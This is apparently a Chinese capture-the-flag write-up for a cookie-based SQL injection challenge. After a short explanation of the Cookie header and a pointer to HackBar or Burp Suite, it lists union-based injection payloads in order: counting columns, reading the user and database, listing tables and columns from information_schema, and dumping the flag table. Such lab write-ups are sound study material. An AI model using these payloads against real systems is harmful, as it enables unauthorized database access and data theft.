Cookie
Cookie:浏览器向服务器发送请求时发送cookie,或者服务器向浏览器附加cookie,就是将cookie附近在这里的。例如:Cookie:user=admin
HackBar,Load一下(BurpSuite等工具也可以)
有个hint(url解码):id输入1试试?
判断字段数:
id=1 order by 2;
查询当前用户和数据库:
id=-1 union select user(),database();
查询当前库的表:
id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="sqli";
查询表的字段:
id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema="sqli" and table_name="ixlftpkscf";
查询数据:
id=-1 union select 1,group_concat(dofizhvvnb) from sqli.ixlftpkscf;